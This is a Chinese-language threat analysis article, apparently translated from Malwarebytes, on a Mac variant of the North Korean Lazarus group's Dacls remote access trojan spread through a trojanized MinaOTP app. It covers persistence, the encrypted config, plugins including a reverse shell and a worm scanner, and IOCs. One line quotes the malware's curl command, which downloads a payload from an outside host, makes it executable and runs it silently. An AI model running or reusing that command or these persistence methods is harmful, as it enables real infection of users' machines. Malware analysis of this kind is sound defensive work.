朝鲜黑客发布针对中国用户的Dacls RAT的Mac变种

Lazarus被美国政府称为“隐藏眼镜蛇”，也被称为APT38，至少自2009年以来就一直活跃，并策划了引人注目的攻击，例如2014年和2017年的索尼黑客攻击想哭的爆发。卡巴斯基将该组织称为对银行的最严重威胁，该组织多次针对加密货币交易所，并于去年被观察到针对macOS用户。去年，安全研究人员确定了Lazarus在攻击中使用的至少两个针对macOS的恶意软件家族，并且他们的武器库中似乎增加了一个新家族：基于Linux的Dacls RAT的Mac变体。我们最近发现，我们认为是与朝鲜的Lazarus小组相关的Dacls远程访问木马（RAT）的新变种，该变种是专门为Mac操作系统设计的。 Dacls是RAT，它是由Qihoo 360 NetLab在2019年12月发现的，是针对Windows和Linux平台的功能齐全的秘密远程访问木马。此Mac版本至少通过用于macOS的Trojanized两步验证应用程序发行，该应用程序称为MinaOTP，主要由中国用户使用。与Linux版本相似，它具有多种功能，包括命令执行，文件管理，流量代理和蠕虫扫描。

发现

4月8日，来自香港的可疑Mac应用程序“ TinkaOTP”已提交给VirusTotal。当时没有任何引擎检测到它。恶意的bot可执行文件位于应用程序的“ Contents / Resources / Base.lproj /”目录中，并且它是Mac可执行文件，并且装作nib文件（“ SubMenu.nib”）。它包含字符串“ c_2910.cls”和“ k_3872.cls”，它们是以前观察到的证书和私钥文件的名称。

坚持不懈

该RAT通过LaunchDaemons或LaunchAgents持久存在，它们采用属性列表（plist）文件，该文件指定了重启后需要执行的应用程序。LaunchAgents和LaunchDaemons之间的区别在于，LaunchAgents代表登录用户运行代码，而LaunchDaemons以root用户运行代码。当恶意应用程序启动时，它将在“ Library / LaunchDaemons”目录下创建一个名称为“ com.aex-loop.agent.plist”的plist文件。plist文件的内容在应用程序中进行了硬编码。该程序还会检查“ getpwuid（getuid（））”是否返回当前进程的用户标识。如果返回用户ID，它将在LaunchAgents目录：“ Library / LaunchAgents /”下创建plist文件“ com.aex-loop.agent.plist”。

存储plist的文件名和目录为十六进制格式，并附加在一起。它们向后显示文件名和目录。

配置文件

配置文件包含有关受害者计算机的信息，例如Puid，Pwuid，插件和C＆C服务器。配置文件的内容使用AES加密算法加密。

Mac和Linux变体都使用相同的AES密钥和IV来加密和解密配置文件。两种变体中的AES模式均为CBC。

配置文件的位置和名称以十六进制格式存储在代码中。该配置文件的名称假装为与Apple Store相关的数据库文件：“Library/Caches/Com.apple.appstore.db”

“ IntializeConfiguration”功能使用以下硬编码的C＆C服务器初始化配置文件。

通过从C＆C服务器接收命令来不断更新配置文件。安装后的应用程序名称为“ mina”。Mina来自MinaOTP应用程序，它是针对macOS的两因素身份验证应用程序。

主循环

初始化配置文件后，执行主循环以执行以下四个主命令：

将C＆C服务器信息从配置文件上载到服务器（0x601）
从服务器下载配置文件内容并更新配置文件（0x602）
通过调用“ getbasicinfo”功能（0x700）从受害者的计算机上载收集的信息
发送心跳信息（0x900）

命令代码与Linux.dacls完全相同。

外挂程式

此Mac RAT具有Linux变体中看到的所有六个插件，以及一个名为“ SOCKS”的附加插件。这个新插件用于代理从受害者到C＆C服务器的网络流量。该应用程序会在主循环开始时加载所有七个插件。每个插件在配置文件中都有自己的配置部分，该部分将在插件初始化时加载。

CMD插件

cmd插件类似于Linux rat中的“ bash”插件，该插件通过为C＆C服务器提供反向外壳来接收和执行命令。

文件插件

文件插件具有读取，删除，下载和搜索目录中文件的功能。Mac和Linux版本之间的唯一区别是Mac版本不具有写入文件的能力（情况0）。

流程插件

进程插件具有终止，运行，获取进程ID和收集进程信息的功能。

如果可访问进程的“ / proc /％d / task”目录，则插件将从进程获取以下信息，其中％d是进程ID：

通过执行“ / proc /％/ cmdline”的过程的命令行参数
“ / proc /％d / status”文件中进程的名称，Uid，Gid，PPid。

测试插件

Mac和Linux变体之间的Test插件的代码是相同的。它检查与C＆C服务器指定的IP和端口的连接。

RP2P插件

RP2P插件是一个代理服务器，用于避免受害者与参与者的基础设施进行直接通信。

LogSend插件

Logsend插件包含三个模块，这些模块：

检查与日志服务器的连接
扫描网络（蠕虫扫描仪模块）
执行长期运行的系统命令

该插件使用HTTP发布请求发送收集的日志。

该插件中一个有趣的功能是蠕虫扫描程序。“ start_worm_scan”可以扫描端口8291或8292上的网络子网。要扫描的子网是基于一组预定义规则确定的。下图显示了选择要扫描的子网的过程。

Socks插件

Socks插件是此Mac Rat中新增的第七个插件。它类似于RP2P插件，并充当媒介来指导bot和C＆C基础结构之间的流量。它使用Socks4进行代理通信。

网络通讯

此Mac RAT使用的C＆C通信类似于Linux变体。为了连接到服务器，应用程序首先建立TLS连接，然后执行信标设置，最后使用RC4算法对通过SSL发送的数据进行加密。

Mac和Linux变体都使用WolfSSL库进行SSL通信。WolfSSL是TLS中的TLS的开源实现，支持多个平台。该库已被多个威胁参与者使用。例如，Tropic Trooper在其Keyboys恶意软件中使用了该库。

用于信标的命令代码与Linux.dacls中使用的代码相同。这是为了确认机器人和服务器的身份。

RC4密钥是通过使用硬编码密钥生成的。

变体和检测

我们还确定了此RAT的另一个变体，该变体使用以下curl命令下载恶意负载： curl -k -o〜/ Library / .mina https://loneeaglerecords.com/wp-content/uploads/2020/01/images.tgz.001> / dev / null 2>＆1 && chmod + x〜/ Library / .mina> / dev / null 2>＆1 &&〜/ Library / .mina> / dev 我们认为，Dcals RAT的Mac变体与Lazarus小组（也称为Hidden Cobra和APT 38）有关，Lazarus小组是自2009年以来一直从事网络间谍活动和网络犯罪活动的臭名昭著的朝鲜威胁演员。该组织是最复杂的参与者之一，能够制作自定义恶意软件以针对不同平台。此Mac RAT的发现表明该APT小组正在不断开发其恶意软件工具集。 Mac的Malwarebytes将该远程管理木马检测为OSX-DaclsRAT。

IOCS

899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 
846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6 
216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d 
d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd 
d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd

loneeaglerecords [。] com / wp-content / uploads / 2020/01 / images.tgz.001

67.43.239.146 
185.62.58.207 
50.87.144.227

0 0 vote

Article Rating

未经允许不得转载：x-sec » 朝鲜黑客发布针对中国用户的Dacls RAT的Mac变种

朝鲜黑客发布针对中国用户的Dacls RAT的Mac变种

发现

坚持不懈

配置文件

主循环

外挂程式

CMD插件

文件插件

流程插件

测试插件

RP2P插件

LogSend插件

Socks插件

网络通讯

变体和检测

IOCS

作者：X-Sec

相关推荐

热门推荐

搜索

最新文章

热门标签

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏